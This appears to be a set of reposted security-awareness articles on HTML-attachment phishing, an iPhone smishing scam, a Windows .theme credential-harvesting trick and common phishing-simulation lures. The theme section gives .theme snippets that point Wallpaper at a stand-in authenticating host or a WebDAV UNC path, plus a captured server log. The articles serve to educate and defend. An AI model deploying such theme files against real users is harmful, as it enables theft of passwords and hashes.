Perpetual IT

In the past few days we received two phishing campaigns – one sent in by a thoughtful reader and the other spammed directly to us – that we thought would tell a useful visual story.

As far as we can tell, these scams originated from two different criminal gangs, operating independently, but they used a similar trick that’s worth knowing about.

The phishing scammer’s three-step

Most straight-up email phishing scams – and you’ve probably received hundreds or even thousands of them yourself in recent times – use a three-stage process:

• Step 1. An email that contains a URL to click through to.

The message might claim to be telling you about an unpaid electricity bill, an undelivered courier item, a suspicious login to your online banking account, a special offer you mustn’t miss, or any of a wide range of other believable ruses.

Sometimes the crooks actually know your name and perhaps even your phone number and your address.

Sometimes the criminals are flying blind and stick to phrases such as “Dear Customer”, “Dear Sir/Madam” or even just “Hello.”

Sometimes they know the name of your electricity provider or bank; sometimes they don’t know but happen to guess correctly; sometimes they fudge the issue by writing some generic text that’s just enough to get your interest.

The email message doesn’t have to say a lot – all it needs to do is catch you at a weak moment so you click the link.

Clicking a phishing link ought to be safe enough on its own, provided you’re careful about what happens next, but it inevitably takes you one step closer to trouble.

• Step 2. A web page where you need to login to go further.

Usually, after you’ve clicked through, there’s a password page, and often it’s a surprisingly good clone of the real thing, created simply by pirating the HTML, images, fonts, stylesheets and JavaScript from the genuine site and installing it somewhere else.

The imposter pages will often be sitting on a legitimate website that’s been hacked to act as a believable springboard for the attack.

Unpatched blogging sites are popular to hack because the crooks can often find somewhere perfectly innocent-looking and unlikely to be noticed, deep in the directory structure of the real site where a few extra images and HTML files won’t attract the attention of the site’s legitimate operator.

Or the imposter pages may be part of a short-lived web hosting account – perhaps set up just a day or two before as a “free trial” that will probably be shut down quickly, but not before the crooks will have cut and run anyway.

• Step 3. A web site where the data you put into the login form gets sent.

Sometimes the “drop site” for the stolen data will be uploaded to the same site used in (2); sometimes the crooks use a third site that may be collecting data from several different phishing campaigns at the same time.

Technically speaking, the clickable link to site (2) appears inside email (1) as what’s known as a hyperlink, encoded into HTML using a so-called anchor tag, written as <A ...>, like this:

The text between the <A> and the </A> usually appears in your browser in blue to denote you can click it to follow a hyperlink jump to somewhere else.

But the clickable text itself isn’t where you go next.

The target of the link, often a URL pointing to another website, is given by the HREF=... value that appears along with the <A>:

(In you want to use the right jargon, you need to known that the <A> part is known as a tag, for which </A> is the matching closing tag. The HREF=... part is referred to as an attribute of the tag.)

Finding the password stealer

Usually, the fake login form that performs the password-stealing part of a phishing scam appears somewhere in the phoney web page on website (2).

So, if you ever need to go looking for the bogus login form, you’ll generally find it on site (2), which, as we just explained, is generally referenced by an HREF=... attribute in email (1).

This time, you’re looking for an HTML tag called <FORM>, and instead of using an HREF=... to denote the URL they’re linked to, form tags have an attribute called ACTION=... that tells your browser where to upload the completed form when you finish:

The button that finishes off your data entry and confirms you want to upload the data you just entered is denoted inside the form by an <INPUT> tag with an attribute that says TYPE="submit", as in the example above.

You might expect that hovering your mouse over the submit button in a form would pop up to show you where your data is going next, in the same way that it does when you hover over a hyperlink, but sadly no browser we know of does this:

Cutting out the middleman

The phishes that we mentioned at the start, one received directly by us and one kindly reported by a reader, worked on the three-step principle we’ve just described.

But there was one important difference.

Step (2), the cloned website with a phoney login page on it, wasn’t reached by clicking a link in the email.

Instead, the bogus web page was brought along for the ride as an HTML attachment, like this:

Opening the attachment doesn’t feel terribly dangerous – after all, it’s not a document that could contain macros and it’s not a PowerShell file or an executable program that could wreak instant havoc.

In theory, opening an HTML attachment should simply open up the enclosed web page in the comparative safety of your browser’s sandbox, as if you had clicked a link.

Like this:

When you open an HTML attachment like this, instead of clicking a conventional web link, there are two huge differences:

• There is no link in the email that you could have checked out in advance to look for a fake or suspicious domain name.
• The URL in the address bar is a harmless looking local filename, with no website name or HTTPS certificate you can examine for signs of bogosity.

There are other reasons not to open HTML attachments, notably to do with JavaScript. For safety’s sake, script code inside HTML emails is stripped or blocked when any modern email reader displays the message. That’s a precaution that email software introduced decades ago when self-spreading script viruses such as Kakworm literally spread everywhere. Kakworm’s script code would activate and the virus would spread as soon as the email was displayed, without waiting for you to click any further. When you open an HTML attachment, however, it is no longer under the strict controls of your email client software, and any JavaScript inside the HTML will be allowed to run by default by your browser.

Here’s another example, this time pretending to be a payment processed by SWIFT, a well-known international processing service for financial transactions. (International bank identification codes, now officially BICs are still widely know as SWIFT codes.)

Of course, neither Microsoft nor SWIFT had anything to do with this email, and there isn’t any payment you need to know about.

The message is just a ruse to make you wonder what’s going on here, and opening the attachment brings up a fake login page designed to phish your password:

The innocent address bar

With no clickable link to give the game away, the browser’s address bar is the obvious place where you’d look to try to verify the web page you just landed on.

As you can see above, the website details that show up for HTML attachments opened locally are just local URLs, starting with file:// instead of http:// or https://.

There’s no encryption to look for, and no TLS certificate you can check, because all you’re really doing is browsing a local temporary file.

In our case, they had names that are unexceptionable enough that we didn’t even bother to redact them in the images above:

file:///tmp/mozilla/Proforma Invoice.html
file:///tmp/mozilla/Payment 66603635.html

The URLs above are what we saw when we ran our test using a Linux email client and with the Firefox browser, but the results are similar on other platforms.

On Windows, for example, you’ll see something like this:

Tracking the FORM data

As explained above, filling in the forms in the fake HTML pages above will send off your password to websites controlled by the criminals.

Of course, email passwords are amongst the most valuable credentials for crooks to acquire, simply because many people use their email account for password resets on a multitude of other accounts.

So, criminals with control over your email account can probably wrest control of many of your other accounts, too, because any password reset emails will end up where the crooks can access them before you even realise that they’re taking over your digital life.

But how to check where a form in a web page will send your data when you submit it?

Unfortunately, we don’t know of any easy way that’s built in to any browser, but you can use your browser’s Developer Tools to do the trick.

In Edge, for example, pressing F12 and choosing the Elements tab will show you a visual view of the HTML structure of the web page:

Searching for the text ACTION (the search doesn’t care whether it’s upper or lower case) should reveal any URLs associated with forms on the page, as you see here:

We’ve redacted the URL here, but we will say that it very obviously had nothing to do with any Microsoft product or service, and immediately outed the login form as fraudulent.

In Firefox, the process is similar: Ctrl-Shift-I will bring up Mozilla’s Inspector toolbox.

Choose the Inspector tab and search for ACTION, and you should be able to track down the URLs used for data upload by any of the forms in the page:

In Safari on a Mac, the key combination to bring up the Inspector is Option-Command-I, after which a search will show you any occurrences of ACTION in the HTML source of the page:

What to do?

The good news is that you don’t need to learn a whole new set of precautions to protect yourself from bring-your-own-webpage phishing scams.

Here’s what to do:

• Avoid HTM or HTML attachments altogether unless they’re from someone you know and you are expecting them. We can’t recall ever receiving an emailed-in web page that wasn’t trying to trick us.
• Avoid logging in on web pages that you arrived at from an email, whether you clicked on a series of links or opened an attachment to get there. If it’s a service you already know how to use – whether it’s your email, your banking site, your blog pages or a social media account – learn how to reach the login page directly. If you always find your own way to your account login pages, you’ll never be tempted by fakes.
• Turn on 2FA if you can. Two-factor authentication means that you need a one-time login code, usually texted to your phone or generated by a special app, that changes every time. 2FA doesn’t guarantee to keep the crooks out, but it makes your password alone much less use to them if they do manage to phish it.
• Change passwords at once if you think you just got phished. The sooner you change your current password after putting it into a site you subsequently suspect, the less time the crooks have to try it out. Similarly, if you get as far as a “pay page” where you enter payment card data and then realise it’s a scam, call your bank’s fraud reporting number at once. (Look on the back of your actual card so you get the right phone number.)
• Use a web filter. A good anti-virus solution (Sophos Home is free for Windows and Mac) won’t just scan incoming content to stop bad stuff such as malware getting in, but will also check outbound web requests to stop good stuff such as passwords getting out. Even in “clickless” attacks like this, the password exfiltration relies on an outgoing web connection that a web filter could block.

---

We do a show on Facebook every week in our Naked Security Live video series, where we discuss one of the big security concerns of the week.

We’d love you to join in if you can – just keep an eye on the @NakedSecurity Twitter feed or check our Facebook page on Fridays to find out the time.

It’s usually about 18:00 UK time, which is early afternoon/late morning on the East/West coast of North America.

Note that you don’t need a Facebook account to watch our live streams, although you will need to login if you want to ask questions or post comments.

For those of you who [a] don’t use Facebook, [b] had buffering problems while we were live, [c] would like subtitles, or [d] simply want to catch up later, we also upload the recorded videos to our YouTube channel.

Here’s last week’s video, where we showed you how to keep yourself, and your friends and family, safe from phishing scams that arrive via SMS – what’s colloquially known as “smishing”:

[embedded content]

(Watch directly on YouTube if the video won’t play here.)

Thanks for watching… hope to see you online later this week!

---

Aren’t SMSes dead? Aren’t they just plain old text anyway? Surely they’re of no interest to cybercriminals any more?

Well, SMSes aren’t dead at all – they’re still widely used because of their simplicity and convenience.

Indeed, as a general-purpose short message service – which is literally what the letters SMS stand for – it’s hard to beat, because any phone can receive text messages, from the fanciest smartphone to the cheapest pre-paid mobile.

If all you need to transmit is a 6-digit logon code or a “pizza driver now 2 minutes away” notification, SMSes still make excellent business sense.

Sadly, however, what works for legitimate businesses almost always works for cybercriminals too, so there are plenty of crooks still using SMSes for phishing – an attack that’s wryly known as smishing.

You can see why SMSes work for crooks.

With just 160 characters per message, it’s easy for them to avoid the grammatical and stylistic blunders that they often make when they’re forced to produce longer-format email messages in a language they don’t speak well.

Better yet, business SMSes generally use URL shorteners to save space, giving the criminals an excuse to do the same.

URL shorteners convert lengthy but meaningful web addresses such as https://brandname.​example.com/​pizza-order.html?​lang=en-US into a compressed but cryptic format such as https://xx.test/ABXt that frees up characters for the rest of the SMS, but disguises where the link is going to end up.

Hovering over a shortened link doesn’t help because the link denotes the actual website you’ll visit. The link shortening site uses the characters after the website name (ABXt in our made-up example above) as an index to look up the real destination and then sends an HTTP 301 Moved Permanently reply to tell your browser where to go next. You need to click through to the shortening site first before you find out where you are supposed to end up.

The SMS system, of course, doesn’t know anything about URLs or even about the internet – but it doesn’t need to.

Your phone’s operating system will happily recognise when the text in an SMS looks like a URL and automatically make it clickable for you.

So, when the crooks use shortened URLs in their smishing scams, they don’t look unusual or out of place, even though the crooks are doing it specifically to be treacherous and not to save space.

As a result, text messages that contain one short, clipped sentence that wouldn’t look right in an email, and that contain deliberately disguised links that we might be suspicious of anywhere else…

…look surprisingly natural when they show up in an SMS.

Like this one we received earlier this week. (We’re not called Christopher and we don’t live in Derry, which is in Northern Ireland. The incomplete address given is a genuine suburban street, presumably plucked from a map to make it seem realistic.)

Dear Christopher, we have your packet in queue. Address: Londonderry, Ballynagard crescent
http COLON SLASH SLASH xxxxxxxx DOT com SLASH zzzzzzz

The message is meant to look as though it was sent to the wrong number, so the crooks are relying on you being intrigued enough to click through, whereupon they use some sneaky “reverse authentication” psychology to lure you in further.

The scam first shows you some cheery messages from a fake Apple chatbot to tell you why you – actually, to tell you why Christopher – had enough luck to be chosen to take part in an iPhone 12 trial, and then it invites you – actually, it invites Christopher – to join in:

Here, the link looks genuine, but the blue characters are simply the clickable text of the link, not the URL that is the destination of the link.

At this point, you’re no longer in the SMS messaging app but have clicked through into your browser, so you can see where the fake link leads if you hover your mouse over it. (On a phone, tap-and-hold on the link until the destination pops up.)

But if you aren’t cautious, you might wonder whether “Christopher” really was part of some Apple pre-release group.

What if you claim Christopher’s promo for yourself?

In fact, what’s stopping you from simply clicking through as if you were Christopher and finding out for yourself?

Well, one thing is stopping you, namely that you have to “prove” yourself by by giving your full name and address – except, of course, that the crooks helpfully leaked that information to you in the original text, making the “test” easy to pass.

You can guess what happens next:

In case you’re wondering, the name-and-address answers above in part 3/5 don’t matter a jot. We tried clicking numerous different combinations and, unsurprisingly, the crooks let us through anyway. The questions are there just to provide a plausible connection back to the SMS that was meant for “Christopher” but that reached you instead. It’s as though the criminals are trying to “authenticate” themselves to you, rather than the other way around.

As you see above, if you do click through the questions then you end up on a scam site (there were several variations, all similar – we tried the smish repeatedly) where you find there’s a courier delivery charge for the “free” phone, typically between £1 and £2.

Then you end up on a credit card payment form that’s hosted on what looks like a “special offers” website with a a believable enough name, and with an HTTPS security padlock if you take the time to look.

Of course, if you try to pay your modest delivery charge, you are simply handing over your personal data to the crooks, including your full card number and security code:

How bad is this?

Is this really a big deal, given that most of us would back ourselves to spot this as a scam right from the start?

Yes, it is.

Many of us have friends or family – perhaps even an at-risk relative who has been scammed before – who wouldn’t be so sure, and for whom the reverse authentication trick of asking for “Christopher’s” name and address might be convincing enough to draw them in further.

And friends don’t let friends get scammed, so if ever you get asked by someone who relies on you for cybersecurity help, “So what would happen if I clicked through?”…

…you can show them the short video above and let them see how these scams play out – without having to click through yourself.

What to do?

• There is no free phone. And if there were a free phone, you wouldn’t have to hand over your credit card details and pay £1 for it. You’re not getting something for nothing – you’re handing over something for nothing, and the crooks will use it against you. If you’re in any doubt, don’t give it out.
• Keep your eyes open for clues. The crooks have made numerous spelling and visual blunders in this scam. We’re not going to help them by listing them all like your English Language teacher would have done at school, but there are quite a few things that just don’t look right, even if you assume that there really is a free phone at the end of this. You might not always notice every clue, but always give yourself the time to look and therefore the best chance to catch out the crooks.
• Look at the link before you click. If anything looks wrong, it IS wrong. Even if the crooks don’t make any spelling or grammatical mistakes they almost always need to lead you to a website that they control. Often, that means a bogus link that you ought to spot if you take your time. Never let yourself get rushed into clicking through, no matter how much the crooks play on your fear of missing out.
• Consider a web filter. Network web filtering on your business network isn’t about surveillance, it’s about online safety. This helps you keep the bad stuff out, and helps your users keep the good stuff in, such as passwords and payment card numbers. Setting up a corporate VPN (virtual private network) means that users at home can browse securely back through the office network and enjoy the same protection that’t they’d have on the LAN at work.

---

Our cybersecurity antennae always start vibrating when we see warnings about attacks that involve a new type of file.

We’re sure you have the same sort of reaction.

After all, if a file type that you’ve treated for years as mostly harmless suddenly turns out to be possibly very dangerous, you’re faced with a double dilemma:

• How long will it take to unlearn an ingrained habit of trusting those files?
• How long will the crooks take to start abusing this new-found knowledge?

We’re all aware of the risks posed by unknown EXE files, for example, because EXE is the extension for native Windows programs – even the operating system itself is implemented as a collection of EXEs.

Most of us also know to be wary of DLLs, which are actually just a special type of EXE file with a different extension to denote that they’re usually used in combination with other programs, rather than loaded on their own.

We’ve learned to be wary of DOCs and DOCXs and all the other Office filetypes, too, because they can include embedded programs called macros.

We’re also aware of a range of risky script files such as JS (for JavaScript), VBS (Visual Basic Script), PS1 (Powershell) and many others that are plain old text files to the untrained eye, but are treated as a series of system commands when processed by Windows itself.

We’ve even taught ourelves to be wary of the extent to which Windows itself misleads us because of its default approach to filenames – as in the case of the files alert and alert.txt below, which go out of their way to convince us they’re just innocent text:

Forget what they look like: those old-school icons on the left that give the impression of being medieval scrolls don’t denote plain old written text at all.

Ironically, however, the icon in the middle that looks like a crisply modern digital document, and that goes with a file that’s actually called document, really is a text file.

By default, Windows suppresses filename extensions, which are the all-important characters that follow the last dot in a filename, such as the .docx at the end of the Word file TaxReturn.docx or the .exe at the end of the program Notepad.exe.

Annoyingly, Windows itself very often uses extensions to decide what to do when you click on a file – for example, whether to view it harmlessly or to execute it riskily.

Yet the operating system rather patronisingly assumes that you don’t need to bother yourself with those pesky extra letters at the end of your filenames.

Indeed, if we turn on the View > File name extensions option (highly recomended!) in File Explorer, you’ll see the dangerous truth behind those “scroll icon” files that looked above as though they were called alert and alert.txt:

In real life, those are .js files, and if you double click on them thinking you are about to open them up to view their contents, then you will get an unpleasant surprise.

Windows will automatically run them as all-powerful JavaScript programs – not in the comparative safety of your web browser, but directly on your computer as local apps.

(Apparently that icon doesn’t represent a scroll. It’s meant to be a script. Who knew?)

Enter the Theme file

At right hand side of the images above, you’ll see files with the extension .theme, denoted by icons that depict what look like a series of background images.

We’re willing to bet that if you’ve ever downloaded and used .theme files (or .themepack files, which are just a collection of .theme files bundled together), you’ve not worried too much about security.

Very loosely speaking, Windows Themes are just INI-style text files that specify various settings for background colours, wallpapers, and visual effects.

Here’s a simple example, a copy of the file justatest.theme depicted above:

[Theme]
DisplayName=JustATest [Control Panel\Desktop]
Wallpaper=C:\Users\duck\Pictures\justatest.png
TileWallpaper=0
WallpaperStyle=10
Pattern= [VisualStyles]
Path=%SystemRoot%\resources\themes\Aero\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
ColorizationColor=0X6B74B8FC
Transparency=1 [MasterThemeSelector]
MTSM=DABJDKT

(No, we don’t know what the text MTSM=DABJDKT in the last line means or what it’s for; we just know that Microsoft insists that you have it in the file and says, “You do not have a choice of values for this parameter.”)

Admittedly, just loading untrusted image files, such as the Wallpaper file specified above, can theoretically be dangerous.

That’s assuming there’s an unpatched vulnerability in one of your apps, or in Windows itself, that can be reliably exploited to trick your computer into running a fragment of executable code when a deliberately crafted image file is opened.

In practice, however, that type of vulnerability is rare these days – those that are found are either quickly patched or jealously guarded, and can usually be triggered by delivering a booby-trapped image directly to your computer in a web page or an email rather than relying on a Theme file to reference them indirectly.

The danger posed by booby-trapped Themes is therefore both small and manageable – giving .theme files a justifiable assessment of mostly harmless.

Despite their generally low direct risk, .theme files nevertheless received a public airing in in the notorious “Vault 7” data dump back in 2017, when WikiLeaks exposed a massive trove of confidential documents allegedly stolen from the CIA. Vault 7 included a knowledgebase article, supposedly from the CIA’s Information Operations Centre, remarking that Themes might be handy as a way of amplifying the effect of an existing exploit by allowing multiple variants of the exploit to be delivered in one go: “[I]n the cases where your execution vector uses icon rendering/file previews to exploit (link files, font files), a theme file can allow you to point to up to three other files and render them from one.”

Harmful after all

But some recent digging by a security researcher going by @bohops revealed that Themes are open to abuse by cybercrimals after all – albeit in an indirect way to phish for passwords rather than directly to implant malware on your computer.

[Credential Harvesting Trick] Using a Windows .theme file, the Wallpaper key can be configured to point to a remote auth-required http/s resource. When a user activates the theme file (e.g. opened from a link/attachment), a Windows cred prompt is displayed to the user 1/4 pic.twitter.com/rgR3a9KP6Q

— bohops (@bohops) September 5, 2020

Traditionally, .theme files are used simply as a way of triggering the automatic installation and rendering of one or more local files – indeed, that’s how the CIA envisaged using them for activating exploits:

In the animation above, you can see how double-clicking a .theme file launches the Windows Settings app, automatically navigates to the Preferences > Themes section, and then opens, copies, selects and renders the new wallpaper file justatest.png onto our desktop.

What if?

So far, things haven’t been very worrying.

Bohops, however, put his “What if?” cybersecurity research hat on, and wondered what might happen if he used a Theme file to reference images out on the internet, using web URLs instead of regular filenames.

Like this, taken from the file called justahack.theme seen above:

[Theme]
DisplayName=JustAHack [Control Panel\Desktop]
Wallpaper=https://themefile.test/justahack.png
TileWallpaper=0
WallpaperStyle=10
Pattern=
. . . .

All we’ve changed is the DisplayName of the Theme itself and the “filename” specified on the Wallpaper line.

In our real-world tests, we used a genuine domain name pointing at a test server of our own, fitted out with a genuine HTTPS certificate from Let’s Encrypt. Here, however, we have redacted the site name and replaced it with a special use domain name, as detailed in RFC 2606 and RFC 6761. We urge you to follow these RFCs in your own cybersecurity articles and documentation. By sticking to IP numbers and domain names that are realistic but will never be allocated in real life, you avoid the risk that someone might blindly copy and paste your examples into one of their own tests and subject some innocent third party to an inadvertent, annoying and possibly even dangerous attack.

Bohops realised that the Settings app will honour the URL in the Theme file, automatically connecting to it without showing you any sort of browser window, and attempting to fetch the file that’s referenced.

That’s slightly more worrying that reading a file that’s already on your computer, but probably still not enough to reclassify Themes as much worse than mostly harmless.

One step further

Bohops was able to go one step further, however.

The trick he figured out was simple but surprisingly effective: point the Theme file at a web server you control, configure your website to require authentication, and see if the Windows computer will supply you with a password.

We did that by mocking up a web server of our own in a few lines of Lua so we could track how the Settings app behaved.

In our server script, we collected the HTTP headers and used a basic HTTP 401 response (“must authenticate”) when the Settings app first came calling.

Here, we check that the web request doesn’t yet contain an Authorization header, which is how a web client denotes that it has already gone through the logon process:

Note that with HTTP Basic authentication, we get to choose the message that we’d like the the other end to display when it prompts for your credentials.

The client responds to a 401 Must authenticate reply by collecting your username and password somehow, combining them into a text string with a colon (:) between, encoding them using Base64, and including the result in its next attempt to fetch the file.

Here’s what happened:

Notice how the credential popup is tagged as belonging to the Windows Settings app rather than your browser, giving it a credibility it doesn’t really deserve.

You should spot the subterfuge, of course, because the password dialog explicitly states the website name it’s connecting to, and makes it clear that it’s the website that’s asking for the password and providing the explanatory text, not Windows itself:

The Settings app will even connect to a non-HTTPS site to fetch Theme files (we tried it to see), though it will warn you not to put in your password due to the lack of encryption:

(If you try to use HTTPS but don’t supply a valid web certificate that Windows trusts, the Settings app will give up silently.)

Does it get worse?

As Bohops and others have pointed out, you can use a Windows UNC path instead of a website name in a Theme file, which tells Windows to use its file-based networking instead of a regular HTTP connection to retrieve the file.

UNC paths are well-known to users of Windows networking, and usually rely on Windows computer names and network share names, such as \\YOURPC\C$\Windows\System32\NOTEPAD.EXE

But you can put an internet domain name or an IP number into a Windows UNC name, and Windows will automatically trigger its built-in WebDAV client to fetch the file, instead of using its own networking protocols.

WebDAV is short for Web Distributed Authoring and Versioning and it’s a modified flavour of HTTP used to support network-based data stores that support files and directories like a regular local or networked filing system such as NTFS or CIFS.

We were able to get Settings to use WebDAV over TLS by specifying our wallpaper like this:

[Theme]
DisplayName=NowWithWebDAV [Control Panel\Desktop]
Wallpaper=\\themefile.test@SSL@443\nowwithwebdav.png
TileWallpaper=0
WallpaperStyle=10
Pattern= . . . .

In theory, getting Windows to connect to a WebDAV resource that requires authentication ought to provoke a Windows-style network login popup, using Windows NTLM (native) authentication rather than the less convincing HTTP-style credential popup that we saw above.

This would make it more likely that a rogue Theme file could trick you into putting in your regular Windows username and password, although NTLM authentication uses a challenge-response hashing system that means the plaintext of your password would not be revealed as it was above when we forced HTTP Basic authentication.

An attacker using the UNC approach would therefore have to collect a hash of your password and crack it – somewhere between very difficult and impossible if you have chosen wisely.

Nevertheless, cybercriminals might be able to recover a poorly-chosen password if they have plenty of computer power to throw at the cracking task (which can be done offline).

We got nowhere

We weren’t able to get anywhere using UNC filenames, however.

We were able to get Windows to make a secure WebDAV connection to our mocked-up WebDAV server, where could monitor the requests from the Settings app.

Once again, we used a stripped down Lua server, and this time we recorded this transcript:

 ===Connection 1 opened ...trying TLS +++using TLS request--> OPTIONS /justahack.png HTTP/1.1 connection: Keep-Alive user_agent: Microsoft-WebDAV-MiniRedir/10.0.19041 translate: f host: themefile.test reply<---- HTTP/1.1 204 No Content MS-Author-Via: DAV DAV: 1, 2 Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK, ACL Content-Length: 0 ===Closed 1 ===Connection 2 opened ...trying TLS +++using TLS request--> PROPFIND /nowwithwebdav.png HTTP/1.1 connection: Keep-Alive user_agent: Microsoft-WebDAV-MiniRedir/10.0.19041 depth: 0 translate: f content_length: 0 host: themefile.test reply<---- HTTP/1.1 401 Must authenticate WWW-Authenticate: NTLM Content-Length: 0 Connection: close ===Closed 2

The session opens with an OPTIONS command, where the client verifies that it’s talking to a WebDAV server rather than to an HTTP server that lacks the WebDAV extensions.

The command PROPFIND that follows is essentially the WebDAV equivalent of the Windows function pair FindFirstFile()/FindNextFile(),and shows us which file Windows wants to download.

We replied to Windows and requested the use of HTTP NTLM authentication

Other researchers who have looked into WebDAV behaviour in the past have reported that the WebDAV client reacts to HTTP NTLM authentication demands by repeating its original unauthenticated request several times, before finally conceding defeat and going through the NTLM challenge-response process.

This ultimately reveals a hashed version of your Windows password that can be attacked, and possibly cracked if the attacker is lucky.

However, in the tests where we double-clicked on Theme files that specified a remote UNC resource, we were not able to provoke Settings into attempting authentication at all, let alone revealing a Windows password hash.

After 19 attempts to locate the nowwithwebdav.png file without authentication, the Settings app gave up every time.

What we can’t tell you is whether that’s down to a deliberate security restriction in the relevant part of the Settings app, to a default Windows NTLM setting that’s specific to the operating system version we were using (Windows 10 Enterprise 19041.450), to a limitation in our fake WebDAV server, or to something else entirely.

If you get further than we did with UNC paths, let us know in the comments below!

What to do?

Fortunately, this isn’t a critical security problem and should be easy to avoid, even if the crooks decided to start trying it out in earnest.

Here are our six tips to stay safe:

• Read password prompts carefully. We agree with @bohops that the phishing popup we demonstrated above is more believable than seeing the same sort of login prompt directly in your browser, not least because the password box is convincingly headlined Settings. Nevertheless, the dialog does make it clear that the password request comes from a remote website, not from Windows, and that the login message comes from the site too, not from the operating system.
• Avoid opening files you aren’t familiar with. It’s harder to spot that something unusual is going on if you aren’t familiar with what is usual.
• Turn on the option to show file extensions. In File Explorer, click on the View item in the menu bar and then turn on the option File name extensions. If the Explorer window is narrow you may need to open the Show/hide tab first. Windows uses file extensions to decide how to handle files, and you should too, because the crooks love to use names like safe.txt.js or harmless.document.exe to throw you off the scent.

• Use a cybersecurity product that includes outbound web filtering. Sophos products, for example, don’t just scan incoming files for malware. After all, phishing attacks don’t rely on getting bad stuff into your network on purpose – they rely on you inadvertently letting good stuff out by mistake. Web filtering can keep you clear of rogue sites in the first place to keep you even further out of harm’s way.
• Pick proper passwords. No, a complex password wouldn’t protect you against the HTTP Basic authentication trick shown above if you entered your own password anyway. But proper password choice will protect you if all an attacker can acquire is a strongly hashed version of your password, because the only way to recover the password is to try a lengthy list of likely password in the hope of finding one that matches the hash. Don’t be the first to fall!
• Report unusual or suspicious content promptly to your security team. We’re betting that you’ve never, or at most very rarely, had anyone trying to foist a Theme file on you before. If an outsider tries to talk you into clicking, opening or approving something that you didn’t expect, don’t need and that you can’t see the point of… ask yourself, “Why would anyone do that?”

---

Sophos Phish Threat, in its own words, is a phishing attack simulator – it lets your IT department send realistic-looking fake phishes to your own staff so that if they do slip up, and click through…

…it’s not the crooks on the other end.

The crooks are testing you all the time, so you might as well test yourself and get one step ahead.

(Don’t panic – this isn’t a product infomercial, just some intriguing statistics that have emerged from users of the product so far this year.)

You can knit your own scam templates to construct your own fake phishes, but the product includes an extensive collection of customisable templates of its own that we update regularly.

The idea is to to track the look and feel of real-world scams of all types, all the way from Scary Warnings of Imminent Doom to low-key messages saying little more than Please see the attached file.

History teaches us that email tricks can work surprisingly well with no text in the message body at all. One of the most prevalent email viruses of all time was HAPPY99, also known as Ska, which came out just over 20 years ago at the start of 1999. The email consisted only of an attachment – there was no subject line or message, so the only visible text in the email was the name of the attachment, HAPPY99.EXE. If you opened it, a New Year’s fireworks display appeared, though the animation was cover for the virus infecting your computer and then spreading to everyone you emailed thereafter. Ironically, the lack of any explanatory text at all meant that the email was much less suspicious than if the subject line had contained words in a language the recipient wouldn’t have expected. HAPPY99 as a filename all on its own had a timely and global appeal that almost certainly tricked millions more people into clicking it than if it had included any sort of marketing pitch.

Searching for the best worst

Well, the Phish Threat team asked themselves, “Which phishing templates give the best, or perhaps more accurately, the worst results?”

Are business email users more likely to fall for sticks or carrots? For threats or free offers? For explicit instructions or helpful suggestions? For “you must” or “you might like”?

The answers covered a broad range of phishing themes, but had a common thread: not one of them was a threat.

Most of them dealt with issues that were mundane and undramatic, while at the same time apparently being interesting, important, or both.

Nothing on this list was truly urgent or terrifying, and they all sounded likely and uncomplicated enough to be worth getting out of the way quickly.

The Top (or Bottom) Ten

1. Rules of conduct. This purported to be a letter from HR outlining the company’s new Rules of Conduct. With global interest in increasing worksplace diversity and reducing harrassment, many companies are revising their employment guidelines. Most staff know that they’re supposed to read new guidelines, and that the HR team is obliged to chase them until they do, so clicking through here feels like a task you might as well get out of the way.

2. Delayed year-end tax summary. This notified staff that their tax docmentation wouldn’t arrive when they expected. Whether your country calls it a W-2, a P60, an IRP 5 or a Payment Summary, it’s one of those “necessary evils” that staff know they need, so they might as well find out how long the delay will be.
3. Scheduled server maintenance. We were surprised that this was #3, because we rather cynically assumed that most people would be inclined to ignore IT messages of this sort, on the grounds that they couldn’t do anything about them anyway. In retrospect, however, now that so many people are working from home, we suspect that people like to know when outages are likely so they can schedule their own lives around them.
4. Task assigned to you. In this message, the Phish Threat user gets to pick a project schedulding system that their own company uses (e.g. JIRA, Asana), so that the email doesn’t stand out as obviously bogus. Although that makes this a semi-targeted phish, you should assume that the business tools used in your company are widely known and easy for crooks to figure out, perhaps even automatically.
5. New email system test. Who doesn’t want to be helpful, if all it takes is one quick click?
6. Vacation policy update. Thanks to coronavirus lockdown and quarantine, booking and taking vaction leave is a tricky issue these days. Many companies are adapting their vacation policies accordingly – and who wants to risk missing out on time off?
7. Car lights on. In this message, the building manager was apparently being cheerily helpful by reporting a car with its lights turned on. In real life, you might be suspicious that they posted a picture instead of just typing in the vehicle tag – but it occurred to us that many states and provinces in North America don’t supply front plates any more, so a photo taken from the front of the vehicle probably wouldn’t show the tag (registration number) anyway.

8. Courier service failed delivery. This is a tried and tested trick that crooks have used for years. It’s especially believable these days thanks to the surge in home deliveries due to coronavirus. In fact, you may be expecting a delivery yourself right now – and in most cases it’s the vendor who decides which courier company to use, so you might not know who is doing the drop.
9. Secure document. This purported to be a “secured document” from the HR team, giving a plausible reason for making you take an unusual route to view it. This trick is widely used by phishing crooks as reason to convince you to enter passwords where you wouldn’t usually have to, or to adjust the security settings on your computer – ostensibly for the sake of improving security, but in reality to reduce it.

10. Social Media Message. This one was a simulated LinkedIn notification promising that “You have unread messages from Joseph”. LinkedIn seems to be enjoying a surge in popularity right now, which is not surprising considering how many people have lost their jobs or had their working hours cut because of the coronvirus downturn. It’s tempting to click through, for fear of missing out, and scammers are happy to capitalise on that.

What to do?

• Think before you click. Even if the message looks innocent at first sight, are there any scam giveaways that are obvious if you take the time to check? Examples include: spelling mistakes you doubt the sender would make, terminology that isn’t how your company would say it, software tools your company doesn’t use, and behaviour such as altering security settings you have explicitly been warned not to change.
• Check with the sender if you aren’t sure. But never check by replying to the email to ask if it’s genuine – you will get the answer “Yes” either way, because a legitimate sender would tell the truth but a crook would lie. Use a corporate directory accessible via trustworthy means to find a way to get in touch with a colleague you think has been impersonated.
• Take a careful look at links before you click. Many phishing emails contain text and images that are error-free. But the crooks often have to rely on temporary cloud servers or hacked websites to host their phishing web pages, and the subterfuge often shows up in the domain name they want you to visit. Don’t be tricked because a server name looks “close enough” – crooks often register near-miss names such as yourcompanny, yourc0mpany (zero for the letter O) or yourcompany-site, using misspellings, similar-looking characters or added text.
• Report suspicious emails to your security team. Get in the habit of doing this every time, even though it feels like a thankless task. Phishing crooks don’t send their emails just to one person at a time, so if you’re the first in the company to spot a new scam, an early warning will let your IT department warn everyone else who might have received it too.

